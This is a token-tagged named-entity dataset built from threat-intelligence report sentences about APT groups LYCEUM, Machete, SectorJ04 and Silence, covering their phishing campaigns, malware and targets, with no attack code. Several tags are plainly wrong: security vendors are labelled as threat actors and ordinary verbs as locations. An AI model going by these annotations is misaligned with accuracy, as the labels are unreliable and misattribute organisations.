O +CTU S-SECTEAM +research O +indicates O +that O +LYCEUM S-APT +may O +have O +been O +active O +as O +early O +as O +April B-TIME +2018 E-TIME +. O +In O +May B-TIME +2019 E-TIME +, O +the O +threat O +group O +launched O +a O +campaign O +against O +oil O +and O +gas O +organizations O +in O +the O +Middle B-LOC +East E-LOC +. O +This O +campaign O +followed O +a O +sharp O +uptick O +in O +development O +and O +testing O +of O +their O +toolkit O +against O +a O +public O +multivendor O +malware O +scanning O +service O +in O +February B-TIME +2019 E-TIME +. O +Stylistically O +, O +the O +observed O +tradecraft O +resembles O +activity O +from O +groups O +such O +as O +COBALT B-APT +GYPSY E-APT +(which O +is O +related O +to O +OilRig S-APT +, O +Crambus S-APT +, O +and O +APT34 S-APT +and O +COBALT B-APT +TRINITY E-APT +also O +known O +as O +Elfin S-APT +and O +APT33 S-APT +. O +When O +CTU S-SECTEAM +researchers O +first O +published O +information O +about O +LYCEUM S-APT +to O +Secureworks O +Threat O +Intelligence O +clients O +, O +no O +public O +documentation O +on O +the O +group O +existed O +. O +Using O +compromised O +accounts O +, O +LYCEUM S-APT +send O +spearphishing B-ACT +emails S-TOOL +with O +malicious O +Excel O +attachments O +to O +deliver S-ACT +the O +DanBot O +malware O +, O +which O +subsequently O +deploys O +post-intrusion B-MAL +tools E-MAL +. O +The O +developer O +consistently O +used O +Accept-Enconding” O +(note O +the O +extra O +‘n’) O +in O +all O +DanBot S-FILE +samples O +analyzed O +by O +CTU S-SECTEAM +researchers O +. O +Get-LAPSP.ps1 S-MAL +is O +a O +PowerShell B-MAL +script E-MAL +that O +gathers O +account O +information O +from O +Active O +Directory O +via O +LDAP O +. O +LYCEUM S-APT +deployed O +this O +tool O +via O +DanBot S-MAL +shortly O +after O +gaining O +initial O +access O +to O +a O +compromised O +environment O +. 
O +LYCEUM S-APT +delivers O +weaponized O +maldocs S-MAL +via O +spearphishing S-ACT +from O +the O +compromised O +accounts O +to O +the O +targeted O +executives O +, O +human O +resources O +(HR) O +staff O +, O +and O +IT O +personnel O +. O +This O +focus O +on O +training O +aligns O +with O +LYCEUM’s S-APT +targeting O +of O +executives S-IDTY +, O +HR B-IDTY +staff E-IDTY +, O +and O +IT B-IDTY +personnel E-IDTY +. O +Despite O +the O +initial O +perception O +that O +the O +maldoc S-MAL +sample O +was O +intended O +for O +ICS S-IDTY +or O +OT B-IDTY +staff E-IDTY +, O +LYCEUM S-APT +has O +not O +demonstrated O +an O +interest O +in O +those O +environments O +. O +However O +, O +CTU S-SECTEAM +researchers O +cannot O +dismiss O +the O +possibility O +that O +the O +LYCEUM S-APT +could O +seek O +access O +to O +OT O +environments O +after O +establishing O +robust O +access O +to O +the O +IT O +environment O +. O +LYCEUM S-APT +is O +an O +emerging O +threat O +to O +energy B-IDTY +organizations E-IDTY +in O +the O +Middle B-LOC +East E-LOC +, O +but O +organizations O +should O +not O +assume O +that O +future O +targeting O +will O +be O +limited O +to O +this O +sector O +. O +Aside O +from O +deploying O +novel O +malware O +, O +LYCEUM’s S-APT +activity O +demonstrates O +capabilities O +CTU S-SECTEAM +researchers O +have O +observed O +from O +other O +threat O +groups O +and O +reinforces O +the O +value O +of O +a O +few O +key O +controls O +. O +Password B-ACT +spraying E-ACT +, O +DNS B-ACT +tunneling E-ACT +, O +social B-ACT +engineering E-ACT +, O +and O +abuse S-ACT +of O +security O +testing O +frameworks O +are O +common O +tactics O +, O +particularly O +from O +threat O +groups S-APT +operating O +in O +the O +Middle B-LOC +East E-LOC +. O +The O +group O +behind O +these O +attacks O +has O +stolen O +gigabytes O +of O +confidential O +documents O +, O +mostly O +from O +military S-IDTY +organizations S-IDTY +. 
O +Machete S-APT +is O +still O +very O +active O +at O +the O +time O +of O +this O +publication O +, O +regularly O +introducing O +changes O +to O +its O +malware S-MAL +, O +infrastructure O +and O +spearphishing S-ACT +campaigns O +. O +ESET S-SECTEAM +has O +been O +tracking O +a O +new O +version O +of O +Machete S-APT +(the O +group’s O +Python-based S-TOOL +toolset) O +that O +was O +first O +seen O +in O +April B-TIME +2018 E-TIME +. O +This O +extends O +to O +other O +countries O +in O +Latin B-LOC +America E-LOC +, O +with O +the O +Ecuadorean B-IDTY +military E-IDTY +being O +another O +organization O +highly O +targeted O +with O +the O +Machete S-APT +malware O +. O +Their S-APT +long O +run O +of O +attacks O +, O +focused O +on O +Latin B-LOC +American E-LOC +countries O +, O +has O +allowed O +them O +to O +collect O +intelligence O +and O +refine O +their O +tactics O +over O +the O +years O +. O +Machete S-APT +is O +interested O +in O +files O +that O +describe B-IDTY +navigation I-IDTY +routes E-IDTY +and O +positioning O +using O +military O +grids O +. O +The O +Machete S-APT +group O +sends S-ACT +very O +specific O +emails S-TOOL +directly O +to O +its O +victims O +, O +and O +these O +change O +from O +target O +to O +target O +. O +The O +Machete S-APT +group O +is O +very O +active O +and O +has O +introduced O +several O +changes O +to O +its O +malware O +since O +a O +new O +version O +was O +released O +in O +April B-TIME +2018 E-TIME +. O +Previous B-FILE +versions E-FILE +were O +described O +by O +Kaspersky S-SECTEAM +in O +2014 S-TIME +and O +Cylance S-APT +in O +2017 S-TIME +. O +Since O +August B-TIME +2018 E-TIME +, O +the O +Machete S-APT +components O +have O +been O +delivered O +with O +an O +extra O +layer O +of O +obfuscation O +. O +The O +GoogleUpdate.exe S-FILE +component O +is O +responsible O +for O +communicating O +with O +the O +remote O +C&C S-TOOL +server O +. 
O +ESET S-SECTEAM +has O +been O +tracking O +this O +threat O +for O +months O +and O +has O +observed O +several O +changes O +, O +sometimes O +within O +weeks O +. O +This O +ACT O +, O +the O +malware S-FILE +can O +have O +its O +configuration O +, O +malicious O +binaries O +and O +file O +listings O +updated O +, O +but O +can O +also O +download O +and O +execute O +other O +binaries O +. O +The O +presence O +of O +code O +to O +exfiltrate O +data O +to O +removable O +drives O +when O +there O +is O +physical O +access O +to O +a O +compromised O +computer O +may O +indicate O +that O +Machete S-APT +operators O +could O +have O +a O +presence O +in O +one O +of O +the O +targeted B-LOC +countries E-LOC +, O +although O +we O +cannot O +be O +certain O +. O +This O +group O +is O +very O +active O +and O +continues O +to O +develop O +new O +features O +for O +its O +malware O +, O +and O +implement O +infrastructure O +changes O +in O +2019 S-TIME +. O +Machete's S-APT +long O +run O +of O +attacks O +, O +focused O +in O +Latin B-LOC +American E-LOC +countries O +, O +has O +allowed O +them O +to O +collect O +intelligence O +and O +refine O +their O +tactics O +over O +the O +years O +. O +ESET S-SECTEAM +researchers O +have O +detected O +an O +ongoing O +, O +highly O +targeted O +campaign O +, O +with O +a O +majority O +of O +the O +targets O +being O +military S-IDTY +organizations O +. O +The O +group O +behind O +Machete S-APT +uses O +effective O +spearphishing S-ACT +techniques O +. O +First O +described O +by O +Kaspersky S-SECTEAM +in O +2014 O +[1] O +and O +later O +, O +by O +Cylance S-SECTEAM +in O +2017 O +[2] O +, O +Machete S-APT +is O +a O +piece O +of O +malware O +found O +to O +be O +targeting O +high O +profile O +individuals O +and O +organizations O +in O +Latin B-LOC +American E-LOC +countries O +. O +In O +2018 S-TIME +Machete S-APT +reappeared O +with O +new O +code O +and O +new O +features O +. 
O +As O +of O +June B-TIME +2019 E-TIME +, O +ESET S-SECTEAM +has O +seen O +over O +50 O +victims O +being O +actively O +spied O +upon O +by O +Machete S-APT +, O +with O +more O +than O +half O +of O +them O +being O +computers O +belonging O +to O +the O +Venezuelan O +military S-IDTY +forces O +. O +Machete S-APT +has O +Latin B-LOC +American E-LOC +targets O +and O +has O +been O +developed O +by O +a O +Spanish-speaking S-LOC +group O +, O +presumably O +from O +a O +LATAM S-LOC +country O +. O +Machete S-APT +was O +active O +and O +constantly O +working O +on O +very O +effective O +spearphishing S-ACT +campaigns S-ACT +. O +In O +some O +cases O +, O +Machete S-APT +trick O +new O +victims O +by O +sending B-ACT +real I-ACT +documents E-ACT +that O +had O +been O +stolen O +on O +the O +very O +same O +day O +. O +Machete S-APT +relies O +on O +spearphishing S-ACT +to O +compromise O +its O +targets O +. O +They S-APT +seem O +to O +have O +specialized O +knowledge O +about O +military S-IDTY +operations O +, O +as O +they O +are O +focused O +on O +stealing O +specific O +files O +such O +as O +those O +that O +describe O +navigation O +routes O +. O +Attackers S-APT +take O +advantage O +of O +that O +, O +along O +with O +their O +knowledge O +of O +military S-IDTY +jargon O +and O +etiquette O +, O +to O +craft O +very O +convincing O +phishing B-ACT +emails S-TOOL +. O +Operators O +behind O +Machete S-APT +apparently O +already O +have O +information O +about O +individuals O +or O +organizations O +of O +interest O +to O +them O +in O +Latin B-LOC +America E-LOC +, O +how O +to O +reach O +them O +, O +and O +how O +best O +to O +trick O +them O +into O +getting O +compromised O +. 
O +Since O +the O +end O +of O +March O +up O +until O +the O +end O +of O +May B-TIME +2019 E-TIME +, O +ESET S-SECTEAM +observed O +that O +there O +were O +more O +than O +50 O +victimized S-ACT +computers S-ACT +actively O +communicating O +with O +the O +C&C S-TOOL +server O +. O +This O +extends O +to O +other O +countries O +in O +Latin B-LOC +America E-LOC +, O +with O +the O +Ecuadorean O +military S-IDTY +being O +another O +organization O +highly O +targeted O +by O +Machete S-APT +. O +Machete S-APT +is O +malware O +that O +has O +been O +developed O +and O +is O +actively O +maintained O +by O +a O +Spanish-speaking S-LOC +group O +. O +Since O +it O +was O +active O +in O +2012 S-TIME +, O +it O +has O +been O +carrying O +out O +attacks O +against O +sensitive O +targets O +in O +China S-LOC +and O +is O +one O +of O +the O +most O +active O +APT O +attack O +organizations S-IDTY +targeting O +mainland O +China S-LOC +in O +recent O +years O +. O +By O +introducing B-ACT +small I-ACT +changes E-ACT +to O +their O +code O +and O +infrastructure O +, O +the O +group O +has O +bypassed O +several O +security O +products O +. O +OceanLotus S-APT +will O +release B-ACT +malicious E-ACT +sub-packages O +in O +the O +background O +, O +receive S-ACT +the O +remote O +control O +command O +, O +steal S-ACT +the O +privacy O +information O +of O +users O +such O +as O +SMS O +messages O +, O +contacts O +, O +call O +records O +, O +geographic O +locations O +, O +and O +browser O +records O +. O +They S-FILE +also O +download O +apks O +secretly O +and O +record O +audios O +and O +videos O +, O +then O +upload O +users’ O +privacy O +information O +to O +server O +, O +causing O +users’ O +privacy O +leakage O +. 
O +It O +can O +be O +seen O +that O +after O +the O +code O +leakage O +, O +the O +CEO O +of O +the O +HackingTeam S-APT +organization O +said O +that O +the O +leaked B-ACT +code E-ACT +is O +only O +a O +small O +part O +is O +based O +on O +the O +facts O +, O +which O +also O +reflects O +that O +the O +network O +arms O +merchants O +have O +lowered O +the O +threshold O +of O +APT B-ACT +attacks E-ACT +to O +a O +certain O +extent O +, O +making O +more O +uncertainties O +of O +cyber O +attacks O +. O +This O +report S-SECTEAM +includes O +details O +related O +to O +the O +major O +hacking O +targets O +of O +the O +SectorJ04 S-APT +group O +in O +2019 S-TIME +, O +how O +those O +targets O +were O +hacked O +, O +characteristics O +of O +their O +hacking O +activities O +this O +year O +and O +recent O +cases O +of O +the O +SectorJ04 S-APT +group’s O +hacking O +. O +In O +2019 S-TIME +, O +the O +SectorJ04 S-APT +group O +expanded O +its O +hacking O +activities O +to O +cover O +various O +industrial B-IDTY +sectors E-IDTY +located O +across O +Southeast B-LOC +Asia E-LOC +and O +East B-LOC +Asia E-LOC +, O +and O +is O +changing O +the O +pattern O +of O +their O +attacks O +from O +targeted O +attacks O +to O +searching O +for O +random O +victims O +. O +The O +SectorJ04 S-APT +group O +has O +maintained O +the O +scope O +of O +its O +existing O +hacking O +activities O +while O +expanding O +its O +hacking O +activities O +to O +companies O +in O +various O +industrial O +sectors O +located O +in O +East B-LOC +Asia E-LOC +and O +Southeast B-LOC +Asia E-LOC +. O +There O +was O +a O +significant O +increase O +in O +SectorJ04's S-APT +hacking O +activities O +in O +2019 S-TIME +, O +especially O +those O +targeting O +South B-LOC +Korea E-LOC +. 
O +They O +mainly O +utilize B-ACT +spam I-ACT +email E-ACT +to O +deliver O +their O +backdoor O +to O +the O +infected O +system O +that O +can O +perform O +additional O +commands O +from O +the O +attacker’s S-APT +server O +. O +We O +saw O +SectorJ04 S-APT +group O +activity O +in O +Germany S-LOC +, O +Indonesia S-LOC +, O +the S-LOC +United S-LOC +States S-LOC +, O +Taiwan S-LOC +, O +India S-LOC +. O +The O +SectorJ04 S-APT +group O +mainly O +utilizes O +a O +spear B-ACT +phishing I-ACT +email E-ACT +with O +MS O +Word S-TOOL +or O +Excel O +files O +attached O +, O +and O +the O +document B-FILE +files E-FILE +downloads O +the O +Microsoft S-IDTY +Installer O +(MSI) O +installation O +file O +from O +the O +attacker S-APT +server O +and O +uses O +it O +to O +install O +backdoor O +on O +the O +infected O +system O +. O +The O +SectorJ04 S-APT +group’s O +preexisting O +targets O +were O +financial B-IDTY +institutions E-IDTY +located O +in O +countries O +such O +as O +North B-LOC +America E-LOC +and O +Europe S-LOC +, O +or O +general O +companies O +such O +as O +retail O +and O +manufacturing O +, O +but O +they O +recently O +expanded O +their O +LOCs O +of O +activity O +to O +include O +the O +medical S-IDTY +, O +pharmaceutical S-IDTY +, O +media S-IDTY +, O +energy S-IDTY +and O +manufacturing S-IDTY +industries O +. O +The O +SectorJ04 S-APT +group O +mainly O +used O +their O +own O +backdoor O +, O +ServHelper S-MAL +and O +FlawedAmmy B-MAL +RAT E-MAL +, O +for O +hacking O +. O + +Backdoors O +are O +installed O +in O +infected O +systems O +and O +SectorJ04 S-APT +also O +distributed O +email S-TOOL +stealers O +, O +botnet O +malware O +and O +ransomware O +through O +those O +backdoors S-MAL +. O +Backdoor S-FILE +installed O +in O +the O +infected O +system O +distributed O +additional B-ACT +botnet E-ACT +malware O +, O +ransomware S-ACT +and O +email S-ACT +stealers S-ACT +. 
O +SectorJ04 S-APT +was O +recently O +confirmed O +to O +use O +additional O +backdoor O +called O +AdroMut S-MAL +and O +FlowerPippi S-MAL +, O +which O +is O +used O +to O +install O +other O +backdoor O +such O +as O +FlawedAmmy O +RAT O +on O +behalf O +of O +the O +MSI O +file O +, O +or O +to O +collect O +system O +information O +and O +send O +it O +to O +the O +attacker’s S-APT +server O +. O +Although O +the O +SectorJ04 S-APT +group O +mainly O +targeted O +countries O +located O +in O +Europe S-LOC +or O +North B-LOC +America E-LOC +, O +it O +has O +recently O +expanded O +its O +field O +of O +activities O +to O +countries O +located O +in O +Southeast B-LOC +Asia E-LOC +and O +East B-LOC +Asia E-LOC +. O +The O +email B-FILE +stealer E-FILE +collects O +connection O +protocol O +information O +and O +account O +information O +, O +such O +as O +SMTP S-PROT +, O +IMAP S-PROT +, O +and O +POP3 S-PROT +, O +which O +are O +stored O +in O +the O +registry O +by O +Outlook S-TOOL +and O +Thunderbird S-TOOL +mail O +clients O +and O +sends O +them O +to O +the O +attacker O +server O +in O +a O +specific O +format O +. O +A O +new O +type O +of O +backdoor O +called O +AdroMut S-MAL +and O +a O +new O +malware O +called O +FlowerPippi S-MAL +was O +also O +found O +coming O +from O +SectorJ04 S-APT +. O +But O +after O +2019 S-TIME +SectorJ04 S-APT +has O +changed O +its O +hacking O +strategy O +to O +attack O +using O +spam S-ACT +email S-ACT +. O +The O +hacking O +activities O +of O +SectorJ04 S-APT +group O +, O +which O +targeted O +South B-LOC +Korea E-LOC +in O +the O +first O +half O +of O +2019 S-TIME +, O +have O +been O +continuously O +discovered O +. 
O +Prior O +to O +2019 O +, O +the O +SectorJ04 S-APT +group O +conducted O +large-scale O +hacking O +activities O +for O +financial O +gain O +using O +exploit B-MAL +kits E-MAL +on O +websites O +to O +install O +ransomware O +, O +such O +as O +Locky S-MAL +and O +GlobeImporter S-MAL +, O +along O +with O +its O +banking S-IDTY +Trojan S-MAL +, O +on O +its O +victims O +computers O +. O +In O +June O +2019 O +, O +continuous O +SectorJ04's S-APT +activities O +targeting O +South B-LOC +Korea E-LOC +were O +found O +again O +and O +spam O +emails S-TOOL +were O +written O +with O +various O +contents O +, O +including O +transaction O +statements O +, O +receipts O +and O +remittance O +cards O +. O +The O +SectorJ04 S-APT +group O +has O +carried O +out O +large-scale O +hacking O +activities O +targeting O +South B-LOC +Korea E-LOC +, O +while O +also O +expanding O +the O +field O +of O +attacks O +to O +Southeast B-LOC +Asian E-LOC +countries O +such O +as O +Taiwan S-LOC +and O +the O +Philippines S-LOC +. O +In O +June S-TIME +, O +SectorJ04 S-APT +group O +conducted O +hacking O +using O +spam O +emails S-TOOL +written O +in O +various O +languages O +, O +including O +English O +, O +Arabic O +, O +Korean O +and O +Italian O +, O +and O +the O +emails S-TOOL +were O +written O +with O +various O +contents O +, O +including O +remittance O +card O +, O +invoice O +and O +tax O +invoice O +. O +Spam O +emails S-TOOL +and O +attachments O +written O +in O +Chinese O +were O +found O +in O +May O +, O +and O +the O +SectorJ04 S-APT +group O +at O +that O +time O +targeted O +industrial O +sectors O +such O +as O +electronics S-IDTY +and O +telecommunications S-IDTY +, O +international S-IDTY +schools O +and O +manufacturing S-IDTY +. 
O +In O +addition O +to O +their O +preexist O +backdoor O +, O +ServHelper S-MAL +and O +FlawedAmmy S-MAL +, O +they O +have O +also O +been O +confirmed O +to O +use O +the O +backdoor O +called O +AdroMut S-MAL +and O +FlowerPippi S-MAL +. O +AdroMut O +downloads O +the O +malware O +ServHelper S-MAL +and O +FlawedAmmy S-MAL +RAT O +used O +by O +the O +SectorJ04 S-APT +group O +from O +the O +attacker O +server O +and O +simultaneously O +performs O +the O +functions O +of O +a O +backdoor O +. O +The O +SectorJ04 S-APT +group O +, O +which O +has O +been O +utilizing O +the O +same O +pattern O +of O +infection O +and O +the O +same O +malware O +for O +more O +than O +six O +months O +, O +is O +believed O +to O +be O +attempting O +to O +change O +its O +infection O +methods O +such O +as O +downloading B-ACT +malware E-ACT +directly O +from O +malicious O +documents O +without O +using O +MSI O +installation O +files O +, O +changing S-ACT +their O +spam O +email S-TOOL +format O +and O +using O +new O +types O +of O +backdoor O +. O +Until O +2019 S-TIME +, O +SectorJ04 S-APT +group O +had O +carried O +out O +massive O +website-based O +hacking O +activities O +that O +mainly O +utilize O +ransomware S-MAL +and O +banking B-MAL +trojans E-MAL +for O +financial O +profit O +, O +and O +has O +also O +been O +carrying O +out O +information B-ACT +gathering I-ACT +activities E-ACT +to O +secure O +attack O +resources O +such O +as O +email S-TOOL +accounts O +and O +system O +login O +information O +from O +users O +since O +2019 S-TIME +. O +The O +SectorJ04 S-APT +group O +has O +shown O +a O +pattern O +of O +hacking O +activities O +that O +have O +changed O +from O +targeted O +attacks O +to O +a O +large-scale O +distribution B-ACT +of I-ACT +spam E-ACT +. 
O +This O +allows O +them O +to O +expand O +their O +range O +of O +targets O +of O +hacking O +activities O +for O +financial O +profit O +, O +and O +in O +this O +regard O +, O +SectorJ04 S-APT +group O +has O +been O +found O +to O +have O +hacked O +into O +a O +company’s O +internal O +network O +by O +using O +a O +spear B-ACT +phishing E-ACT +email S-TOOL +targeting O +executives O +and O +employees O +of O +certain O +South B-LOC +Korean E-LOC +companies S-IDTY +around O +February B-TIME +2019 E-TIME +. O +SectorJ04 S-APT +group O +carried O +out O +intensive O +hacking O +on O +various O +industrial O +sectors O +, O +including O +South O +Korea’s O +media S-IDTY +, O +manufacturing S-IDTY +and O +universities S-IDTY +, O +around O +February S-TIME +and O +March B-TIME +2019 E-TIME +. O +SectorJ04 S-APT +used O +the O +spear B-ACT +phishing E-ACT +email S-TOOL +to O +spread O +malicious O +Excel O +or O +malicious O +Word S-TOOL +files O +, O +and O +downloaded O +the O +MSI O +files O +from O +the O +attacker’s S-APT +server O +when O +the O +malicious O +documents O +were O +run O +. O +SectorJ04 S-APT +group O +conducted O +hacking B-ACT +activities E-ACT +targeting O +financial S-IDTY +institutions O +located O +in O +India S-LOC +and O +Hong B-LOC +Kong E-LOC +around O +April B-TIME +2019 E-TIME +. O +SectorJ04 S-APT +group O +carried O +out O +hacking O +activities O +targeting O +financial S-IDTY +institutions O +located O +in O +Italy S-LOC +and O +other O +countries O +around O +May B-TIME +2019 E-TIME +. O +In O +late O +July S-TIME +, O +SectorJ04 S-APT +group O +used O +FlawedAmmy O +RAT O +to O +carry O +out O +hacking O +attacks O +on O +companies O +and O +universities O +in O +sectors O +such O +as O +education S-IDTY +, O +job B-IDTY +openings E-IDTY +, O +real B-IDTY +estate E-IDTY +and O +semiconductors S-IDTY +in O +South B-LOC +Korea E-LOC +. 
O +In O +early O +August S-TIME +, O +the O +SectorJ04 S-APT +group O +carried O +out O +extensive O +hacking B-ACT +activities E-ACT +targeting O +the O +users O +around O +the O +world O +, O +including O +South B-LOC +Korea E-LOC +, O +India S-LOC +, O +Britain S-LOC +, O +the O +United B-LOC +States E-LOC +, O +Germany S-LOC +, O +Canada S-LOC +, O +Argentina S-LOC +, O +Bangladesh S-LOC +and O +Hong B-LOC +Kong E-LOC +. O +Spam B-ACT +emails S-TOOL +targeting O +email S-TOOL +accounts O +used O +in O +the O +integrated O +mail O +service O +of O +public O +officials O +were O +also O +found O +in O +the O +hacking B-ACT +activity E-ACT +. O +They O +are O +one O +of O +the O +most O +active O +cyber O +crime O +groups S-APT +in O +2019 S-TIME +, O +and O +they O +often O +modify O +and O +tweak O +their O +hacking O +methods O +and O +perform O +periodic O +hacking S-ACT +activities S-ACT +. O +Now O +, O +Silence S-APT +is O +one O +of O +the O +most O +active O +threat O +actors O +targeting O +the O +financial S-IDTY +sector O +. O +Since O +we O +released O +our O +original O +report O +, O +Silence: S-APT +Moving O +into O +the O +darkside O +, O +the O +confirmed O +damage O +from O +Silence's O +operations O +has O +increased O +fivefold O +compared O +to O +the O +figures O +in O +Group-IB's S-SECTEAM +initial O +report O +. O +Silence S-APT +started O +by O +targeting O +organizations O +in O +Russia S-LOC +, O +gradually O +shifting O +their O +focus O +to O +former B-LOC +Soviet E-LOC +countries O +, O +and O +then O +the O +world O +. O +Silence S-APT +also O +started O +using O +Ivoke S-MAL +, O +a O +fileless O +loader O +, O +and O +EDA B-MAL +agent E-MAL +, O +both O +written O +in O +PowerShell S-TOOL +. 
O +Silence O +2.0: O +Going B-SECTEAM +Global E-SECTEAM +is O +an O +extension O +of O +our O +original O +report: O +Silence: O +Moving O +into O +the O +Darkside O +which O +remains O +the O +most O +significant O +contribution O +to O +the O +research O +on O +the O +group O +and O +is O +the O +first O +such O +report O +to O +reveal O +Silence’s B-APT +activity E-APT +. O +Since O +the O +report’s O +release O +in O +September B-TIME +2018 E-TIME +, O +Group-IB’s S-SECTEAM +Threat O +Intelligence O +team O +has O +detected O +16 O +campaigns O +targeting O +banks S-IDTY +launched O +by O +Silence S-APT +. O +Like O +the O +majority O +of O +APT O +groups O +, O +Silence S-APT +uses O +phishing S-ACT +as O +their O +infection O +vector O +. O +In O +the O +last O +successful B-ACT +attack E-ACT +described O +in O +Silence: O +Moving O +into O +the O +darkside O +, O +dated O +April B-TIME +2018 E-TIME +, O +the O +hackers O +siphoned O +off O +about O +$150 O +, O +000 O +through O +ATMs O +in O +a O +single O +night O +. O +Prior O +to O +April B-TIME +2018 E-TIME +, O +as O +described O +in O +Group-IB’s S-APT +Silence: O +Moving O +into O +the O +darkside O +report O +, O +Silence’s O +target O +interests O +were O +primarily O +limited O +to O +former B-LOC +Soviet E-LOC +and O +Eastern B-LOC +European E-LOC +countries O +including O +Russia S-LOC +, O +Ukraine S-LOC +, O +Belarus S-LOC +, O +Azerbaijan S-LOC +, O +Poland S-LOC +, O +and O +Kazakhstan S-LOC +. O +In O +2018 S-TIME +, O +Silence S-APT +conducted O +test O +campaigns O +to O +update O +their O +database O +of O +current O +targets O +and O +expand O +their O +attack O +geography O +. O +The O +threat O +actor’s S-APT +emails S-TOOL +usually O +contain O +a O +picture O +or O +a O +link O +without O +a O +malicious B-FILE +payload E-FILE +and O +are O +sent O +out O +to O +a O +huge O +recipient O +database O +of O +up O +to O +85 O +, O +000 O +users S-IDTY +. 
O +Silence S-APT +has O +conducted O +at O +least O +three O +campaigns O +using O +recon O +emails S-TOOL +, O +followed O +by O +malicious B-ACT +mail E-ACT +sent O +to O +an O +updated O +recipient O +list O +. O +Group-IB S-SECTEAM +has O +also O +detected O +recon B-FILE +emails E-FILE +sent O +out O +to O +New S-LOC +Zealand S-LOC +. O +Since O +our O +last O +public O +report O +, O +Silence S-APT +has O +sent O +out O +more O +than O +170 O +, O +000 O +recon O +emails S-TOOL +to O +banks S-IDTY +in O +Russia S-LOC +, O +the O +former B-LOC +Soviet E-LOC +Union O +, O +Asia S-LOC +and O +Europe S-LOC +. O +In O +November B-TIME +2018 E-TIME +, O +Silence S-APT +tried O +their O +hand O +at O +targeting O +the O +Asian B-IDTY +market E-IDTY +for O +the O +first O +time O +in O +their O +history O +. O +In O +total O +, O +Silence S-APT +sent O +out O +about O +80 O +, O +000 O +emails S-TOOL +, O +with O +more O +than O +half O +of O +them O +targeting O +Taiwan S-LOC +, O +Malaysia S-LOC +, O +and O +South B-LOC +Korea E-LOC +. O +Prior O +to O +April B-TIME +2018 E-TIME +, O +as O +described O +in O +Group-IB’s S-APT +Silence: O +Moving O +into O +the O +darkside O +report O +, O +Silence’s S-APT +target O +interests O +were O +primarily O +limited O +to O +former B-LOC +Soviet E-LOC +and O +Eastern B-LOC +European E-LOC +countries O +including O +Russia S-LOC +, O +Ukraine S-LOC +, O +Belarus S-LOC +, O +Azerbaijan S-LOC +, O +Poland S-LOC +, O +and O +Kazakhstan S-LOC +. O +From O +16 B-TIME +October I-TIME +2018 E-TIME +to O +1 B-TIME +January I-TIME +2019 E-TIME +, O +Silence S-APT +sent O +out O +about O +84 O +, O +000 O +emails S-TOOL +in O +Russia O +alone O +to O +update O +their O +address O +database O +. 
O +As O +part O +of O +their O +phishing S-ACT +campaigns O +, O +silence S-APT +still O +uses O +Microsoft S-IDTY +Office O +documents O +with O +macros O +or O +exploits O +, O +CHM O +files O +, O +and O +.lNK S-FILE +shortcuts O +as O +malicious O +attachments O +. O + +In O +the O +former B-LOC +Soviet E-LOC +Union O +, O +Silence S-APT +targeted O +banks S-IDTY +in O +Kyrgyzstan S-LOC +, O +Kazakhstan S-LOC +, O +and O +Ukraine S-LOC +. O + +In O +2019 S-TIME +, O +Group-IB S-SECTEAM +also O +observed O +the O +use O +of O +a O +new O +fileless O +PowerShell S-TOOL +loader O +called O +Ivoke S-FILE +. O + +The O +Silence.Main B-FILE +Trojan E-FILE +, O +which O +is O +the O +main O +stage O +of O +the O +attack O +, O +has O +a O +full O +set O +of O +commands O +to O +control O +a O +compromised O +computer O +. O + +As O +the O +CnC O +server O +, O +Silence S-APT +use O +CnC-3 B-MAL +server E-MAL +running O +Windows S-OS +, O +from O +which O +they O +send O +commands O +to O +download O +additional O +modules O +. O + +To O +control O +ATMs O +, O +the O +group O +uses O +the O +Atmosphere B-MAL +Trojan E-MAL +, O +which O +is O +unique O +to O +Silence S-APT +, O +or O +a O +program O +called O +xfs-disp.exe S-MAL +. O +In O +addition O +, O +Silence S-APT +downloads O +the O +reverse O +proxy O +programs O +Silence.ProxyBot S-MAL +and O +SilenceProxyBot.NET S-MAL +, O +which O +are O +described O +in O +detail O +in O +the O +report O +Silence: O +moving O +into O +the O +darkside O +. O + +Analysis O +of O +the O +emails S-TOOL +has O +shown O +that O +the O +attachment O +contains O +an O +exploit S-VULNAME +for O +the O +CVE-2017-11882 B-VULID +vulnerability S-VULNAME +. O + +Group-IB S-SECTEAM +specialists O +tracked O +a O +massive O +mailout O +of O +emails S-TOOL +containing O +a O +malicious B-FILE +Microsoft I-FILE +Word I-FILE +attachment I-FILE +titled I-FILE +Договор.doc” E-FILE +[Contract.doc] S-FILE +. 
O + +Silence S-APT +sent O +out O +emails S-TOOL +to O +Russian S-LOC +banks S-IDTY +. O + +The O +exploit S-VULNAME +installs O +Silence’s S-APT +loader O +, O +designed O +to O +download O +backdoors O +and O +other O +malicious O +programs O +. O + +Silence S-APT +conducted O +a O +massive O +phishing S-ACT +campaign O +posing S-ACT +as O +the O +Central B-IDTY +Bank E-IDTY +of O +the O +Russian S-LOC +Federation O +. O + +Group-IB S-SECTEAM +specialists O +have O +established O +that O +the O +aim O +of O +the O +attack O +was O +to O +deliver O +and O +launch O +the O +second O +stage O +of O +Silence’s S-APT +Trojan S-MAL +, O +known O +as O +Silence.MainModule S-MAL +. O + +Silence S-APT +attacked O +financial S-IDTY +organisations O +in O +the O +UK S-LOC +. O +Silence S-APT +conducted O +the O +first O +stage O +of O +their O +Asian S-LOC +campaign O +, O +organising O +a O +massive O +phishing E-ACT +attack O +aimed O +at O +receiving S-LOC +an O +up-to-date O +list O +of O +current O +recipients O +in O +different O +countries O +for O +further O +targeted O +attacks O +delivering S-LOC +their O +malicious O +software O +. O +The O +attackers S-APT +used O +the O +server O +deployed O +on O +6 B-TIME +June I-TIME +2019 E-TIME +to O +control O +compromised O +workstations O +in O +these O +banks S-IDTY +. O +On O +24 B-TIME +March I-TIME +2019 E-TIME +, O +Silence.ProxyBot S-MAL +( +MD5 S-ENCR +2fe01a04d6beef14555b2cf9a717615c S-MD5 +) O +was O +uploaded O +to O +VirusTotal S-TOOL +from O +an O +IP S-PROT +address O +in O +Sri B-LOC +Lanka E-LOC +. O +On O +October S-TIME +18th S-TIME +, O +2018 S-TIME +, O +the O +group O +sent O +out O +emails S-TOOL +to O +British S-LOC +financial S-IDTY +companies O +as O +part O +of O +their O +preparatory O +campaign O +. O +Group-IB S-SECTEAM +experts O +established O +that O +the O +server O +185.20.187.89 O +started O +functioning O +no O +later O +than O +28 B-TIME +January I-TIME +2019 E-TIME +. 
